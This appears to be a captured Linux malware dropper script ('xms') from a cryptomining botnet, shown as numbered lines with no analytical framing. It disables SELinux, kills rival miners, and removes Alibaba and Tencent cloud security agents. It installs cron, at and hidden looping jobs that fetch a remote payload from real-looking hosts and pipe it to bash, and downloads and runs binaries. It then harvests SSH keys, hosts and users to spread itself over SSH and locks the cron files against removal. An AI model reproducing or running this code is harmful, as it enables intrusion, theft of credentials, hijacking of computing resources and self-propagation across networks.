xms

1. #!/bin/bash
2. SHELL=/bin/bash
3. PATH=/sbin:/bin:/usr/sbin:/usr/bin
4. setenforce 0 2>/dev/null
5. ulimit -u 50000
6. sysctl -w vm.nr_hugepages=$((`grep -c processor /proc/cpuinfo` * 3))
7. netstat -antp | grep ':3333' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
8. netstat -antp | grep ':4444' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
9. netstat -antp | grep ':5555' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
10. netstat -antp | grep ':7777' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
11. netstat -antp | grep ':14444' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
12. netstat -antp | grep ':5790' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
13. netstat -antp | grep ':45700' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
14. netstat -antp | grep ':2222' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
15. netstat -antp | grep ':9999' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
16. netstat -antp | grep ':20580' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
17. netstat -antp | grep ':13531' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
18. netstat -antp | grep '23.94.24.12:8080' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
19. netstat -antp | grep '134.122.17.13:8080' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
20. netstat -antp | grep '107.189.11.170:443' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
21. rand=$(seq 0 255 | sort -R | head -n1)
22. rand2=$(seq 0 255 | sort -R | head -n1)
23. chattr -i -a /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down
24.  
25. if ps aux | grep -i '[a]liyun'; then
26. (wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
27. (wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
28. pkill aliyun-service
29. rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
30. rm -rf /usr/local/aegis*
31. systemctl stop aliyun.service
32. systemctl disable aliyun.service
33. service bcm-agent stop
34. yum remove bcm-agent -y
35. apt-get remove bcm-agent -y
36. elif ps aux | grep -i '[y]unjing'; then
37. /usr/local/qcloud/stargate/admin/uninstall.sh
38. /usr/local/qcloud/YunJing/uninst.sh
39. /usr/local/qcloud/monitor/barad/admin/uninstall.sh
40. fi
41. sleep 1
42. echo "DER Uninstalled"
43.  
44. #ar[0]="http://205.185.118.119"
45. #ar[1]="http://185.101.107.92"
46. #ar[2]="http://185.157.160.214"
47. #ran=$[$RANDOM % ${#ar[@]}]
48. #url2=${ar[$ran]}
49. url2="http://185.157.160.214"
50.  
51.  
52. if [ $(ping -c 1 a.oracleservice.top 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ];
53. then
54. url="http://a.oracleservice.top"
55. else
56. url="http://185.157.160.214"
57. fi
58.  
59.  
60. echo -e "*/1 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /etc/cron.d/root
61. echo -e "*/2 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /etc/cron.d/apache
62. echo -e "*/3 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /etc/cron.d/nginx
63. echo -e "*/30 * * * * (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /var/spool/cron/root
64. mkdir -p /var/spool/cron/crontabs
65. echo -e "* * * * * (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms\n##" > /var/spool/cron/crontabs/root
66. mkdir -p /etc/cron.hourly
67. echo "(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1
68.  
69. DIR="/tmp"
70. cd $DIR
71.  
72. if [ -a "/tmp/dbused" ]
73. then
74. if [ -w "/tmp/dbused" ] && [ ! -d "/tmp/dbused" ]
75. then
76. if [ -x "$(command -v md5sum)" ]
77. then
78. sum=$(md5sum /tmp/dbused | awk '{ print $1 }')
79. echo $sum
80. case $sum in
81. dc3d2e17df6cef8df41ce8b0eba99291 | 780965bad574e4e7f04433431d0d8f63)
82. echo "x86_64 OK"
83. ;;
84. *)
85. echo "x86_64 wrong"
86. rm -rf /usr/local/lib/libkk.so
87. echo "" > /etc/ld.so.preload
88. pkill -f wc.conf
89. pkill -f susss
90. sleep 4
91. ;;
92. esac
93. fi
94. echo "P OK"
95. else
96. DIR=$(mktemp -d)/tmp
97. mkdir $DIR
98. echo "T DIR $DIR"
99. fi
100. else
101. if [ -d "/tmp" ]
102. then
103. DIR="/tmp"
104. fi
105. echo "P NOT EXISTS"
106. fi
107. if [ -d "/tmp/.sh/dbused" ]
108. then
109. DIR=$(mktemp -d)/tmp
110. mkdir $DIR
111. echo "T DIR $DIR"
112. fi
113.  
114. get() {
115. chattr -i $2; rm -rf $2
116. wget -q -O - $1 > $2 || curl -fsSL $1 -o $2 || lwp-download $1 $2 ||
117. chmod +x $2
118. }
119.  
120.  
121. downloadIfNeed()
122. {
123. if [ -x "$(command -v md5sum)" ]
124. then
125. if [ ! -f $DIR/dbused ]; then
126. echo "File not found!"
127. download
128. fi
129. sum=$(md5sum $DIR/dbused | awk '{ print $1 }')
130. echo $sum
131. case $sum in
132. dc3d2e17df6cef8df41ce8b0eba99291 | 780965bad574e4e7f04433431d0d8f63)
133. echo "x86_64 OK"
134. ;;
135. *)
136. echo "x86_64 wrong"
137. sizeBefore=$(du $DIR/x86_64)
138. if [ -s /usr/bin/curl ];
139. then
140. WGET="curl -k -o ";
141. fi
142. if [ -s /usr/bin/wget ];
143. then
144. WGET="wget --no-check-certificate -O ";
145. fi
146. download
147. sumAfter=$(md5sum $DIR/x86_64 | awk '{ print $1 }')
148. if [ -s /usr/bin/curl ];
149. then
150. echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sssus` > $DIR/tmp.txt
151. fi
152. ;;
153. esac
154. else
155. echo "No md5sum"
156. download
157. fi
158. }
159.  
160.  
161. download() {
162. if [ -x "$(command -v md5sum)" ]
163. then
164. sum=$(md5sum $DIR/x86_643 | awk '{ print $1 }')
165. echo $sum
166. case $sum in
167. dc3d2e17df6cef8df41ce8b0eba99291 | dc3d2e17df6cef8df41ce8b0eba99291)
168. echo "x86_64 OK"
169. cp $DIR/x86_643 $DIR/x86_64
170. cp $DIR/x86_643 $DIR/x86_64
171. ;;
172. *)
173. echo "x86_64 wrong"
174. download2
175. ;;
176. esac
177. else
178. echo "No md5sum"
179. download2
180. fi
181. }
182.  
183. download2() {
184. get $url/$(uname -m) "$DIR"/dbused
185. if [ -x "$(command -v md5sum)" ]
186. then
187. sum=$(md5sum $DIR/dbused | awk '{ print $1 }')
188. echo $sum
189. case $sum in
190. dc3d2e17df6cef8df41ce8b0eba99291 | 780965bad574e4e7f04433431d0d8f63)
191. echo "x86_64 OK"
192. cp $DIR/x86_64 $DIR/x86_643
193. ;;
194. *)
195. echo "x86_64 wrong"
196. ;;
197. esac
198. else
199. echo "No md5sum"
200. fi
201. }
202.  
203. judge() {
204. if [ ! "$(netstat -ant|grep '51.79.175.139:8080\|146.59.198.38:8080\|167.114.114.169:8080'|grep 'ESTABLISHED'|grep -v grep)" ];
205. then
206. get $url2/$(uname -m) "$DIR"/dbused
207. chmod +x "$DIR"/dbused
208. "$DIR"/dbused -c $dns
209. "$DIR"/dbused -pwn
210. else
211. echo "Running"
212. fi
213. }
214.  
215. if [ ! "$(netstat -ant|grep '51.79.175.139:8080\|146.59.198.38:8080\|167.114.114.169:8080'|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ];
216. then
217. judge
218. else
219. echo "Running"
220. fi
221.  
222. if [ ! "$(netstat -ant|grep '51.255.171.23:443'|grep 'ESTABLISHED'|grep -v grep)" ];
223. then
224. get $url2/bashirc.$(uname -m) $DIR/bashirc; chmod +x $DIR/bashirc; $DIR/bashirc; rm -rf $DIR/bashirc
225. fi
226.  
227.  
228. cronbackup() {
229. pay="(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR"
230. status=0
231. crona=$(systemctl is-active cron)
232. cronb=$(systemctl is-active crond)
233. cronatd=$(systemctl is-active atd)
234. if [ "$crona" == "active" ] ; then
235. echo "cron okay"
236. elif [ "$cronb" == "active" ]; then
237. echo "cron okay"
238. elif [ "$cronatd" == "active" ] ; then
239. status=1
240. else
241. status=2
242. fi
243. if [ $status -eq 1 ] ; then
244. for a in $(at -l|awk '{print $1}'); do at -r $a; done
245. echo "$pay" | at -m now + 1 minute
246. fi
247. if [ $status -eq 2 ] || [ "$me" != "root" ] ;then
248. arr[0]="/dev/shm"
249. arr[1]="/tmp"
250. arr[2]="/var/tmp"
251. arr[3]="/home/$(whoami)"
252. arr[4]="/run/user/$(echo $UID)"
253. arr[5]="/run/user/$(echo $UID)/systemd"
254. rand=$[$RANDOM % ${#arr[@]}]
255. echo "Setting up custom backup"
256. ps auxf|grep -v grep|grep "cruner" | awk '{print $2}'|xargs kill -9
257. key="while true; do sleep 60 && $pay; done"
258. echo -e "$key\n##" > ${arr[$rand]}/cruner && chmod 777 ${arr[$rand]}/cruner
259. nohup ${arr[$rand]}/cruner >/dev/null 2>&1 &
260. sleep 15
261. rm -rf ${arr[$rand]}/cruner
262. fi
263. }
264. cronbackup
265.  
266.  
267. if crontab -l | grep -q "$url"
268. then
269. echo "Cron exists"
270. else
271. crontab -r
272. echo "Cron not found"
273. echo "* * * * * (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms" | crontab -
274. fi
275.  
276. KEYS=$(find ~/ /root /home -maxdepth 2 -name 'id_rsa*' | grep -vw pub)
277. KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
278. KEYS3=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
279. HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
280. HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
281. HOSTS3=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
282. USERZ=$(
283. echo "root"
284. find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -v "\.ssh"
285. )
286. userlist=$(echo $USERZ | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
287. hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
288. keylist=$(echo "$KEYS $KEYS2 $KEYS3" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
289. for user in $userlist; do
290. for host in $hostlist; do
291. for key in $keylist; do
292. chmod +r $key; chmod 400 $key
293. ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host "(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$url/xms\").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms"
294. done
295. done
296. done
297.  
298. rm -rf "$DIR"/2start.jpg
299. rm -rf "$DIR"/xms
300. chattr +ai -V /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down